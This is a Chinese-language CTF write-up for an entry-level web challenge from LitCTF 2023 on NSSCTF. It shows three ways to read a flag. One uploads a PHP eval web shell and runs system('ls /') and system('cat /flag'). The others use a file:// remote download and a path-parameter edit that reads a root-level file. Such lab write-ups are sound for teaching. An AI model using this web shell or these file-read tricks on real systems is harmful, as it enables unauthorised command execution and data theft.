NSSCTF入门题单[LitCTF 2023]WriteUP-NSSCTF-3867
North-Glory 2024-11-25
CTF
NSSCTF
WriteUP
[LitCTF 2023]这套题是Web方向入门题单,这是我的第17题
- 题单【传送门 (opens new window)】
- 主办方WriteUP【传送门 (opens new window)】
- 主办方WriteUP视频【传送门 (opens new window)】
题目编号 | 题目名称 | 题目方向 | 难度 |
---|---|---|---|
3867 | 作业管理系统 | Web | 1 |
# 题目17: 作业管理系统
# 题目描述:交作业!!但是哪里不对?
# 考点1:文件上传
首先,我们在做Web题的时候,要记得先审查元素看一下源代码,说不定会有惊喜呢?这里提示我们用户名和密码都是admin
# 解法1:文件上传
进入页面后可以看到很显眼的“文件上传”选项,我们直接点击上传文件
我们编写一个简单的php木马上传到服务器中。
<?php @eval($_POST[1]); ?>
1
我们点击上传以后,返回主页,看到目录上方的统计数量变成了“1 个文件夹 2 个文件”,我们知道是我们上传成功了。我们已经可以在浏览器去访问1.php的文件了。
http://node4.anna.nssctf.cn:28599/1.php
1
我们进入页面后,打开F12开发者工具,选择HackBar工具,发送一个POST请求,内容为
# 1是我们在木马里起的名字
1=system("ls /");
1
2
2
通过上边的方式,我们可以直接在运行system语句来执行服务器命令,这样,我们就可以直接用cat来展示flag了
1=system("cat /flag");
1
# 解法2:远程下载
我们在打开页面后,除了有上传文件,还有一个下载文件的地方。此题目如果上传有限制的话,就可以使用这个下载的功能,用远程下载去下载木马,然后编辑保存即可。
**重点:**基于file协议,将根目录文件直接下载到当前目录
**注:**页面访问的是当前目录,也就是 ./ 这个目录,而flag是在 / 根目录下
点击下载后,我们选择编辑文件,即可查看该flag。
也可以在链接后直接加个flag,通过地址栏的方式直接下载flag的文件。
http://node4.anna.nssctf.cn:28599/flag
1
下载到本地后打开即可看到flag
# 解法3:直接编辑读取
如果没有使用 file:/// 这个协议,我们可以在下载文件并编辑的时候,直接修改地址栏的内容
http://node4.anna.nssctf.cn:28599/index.php?op=edit&fename=flag&folder=/
1
通过这段地址,我们就可以直接编辑根目录下的flag文件,也就可以直观的展示到页面中了。
# 彩蛋:
在远程下载中,提供了一个预输入,访问该地址,即可得到彩蛋。
该地址是一个github地址,我们访问这个地址
# 注:
在做这道题的时候,没注意到时间限制,结果到时间了,大家一定要注意时间呀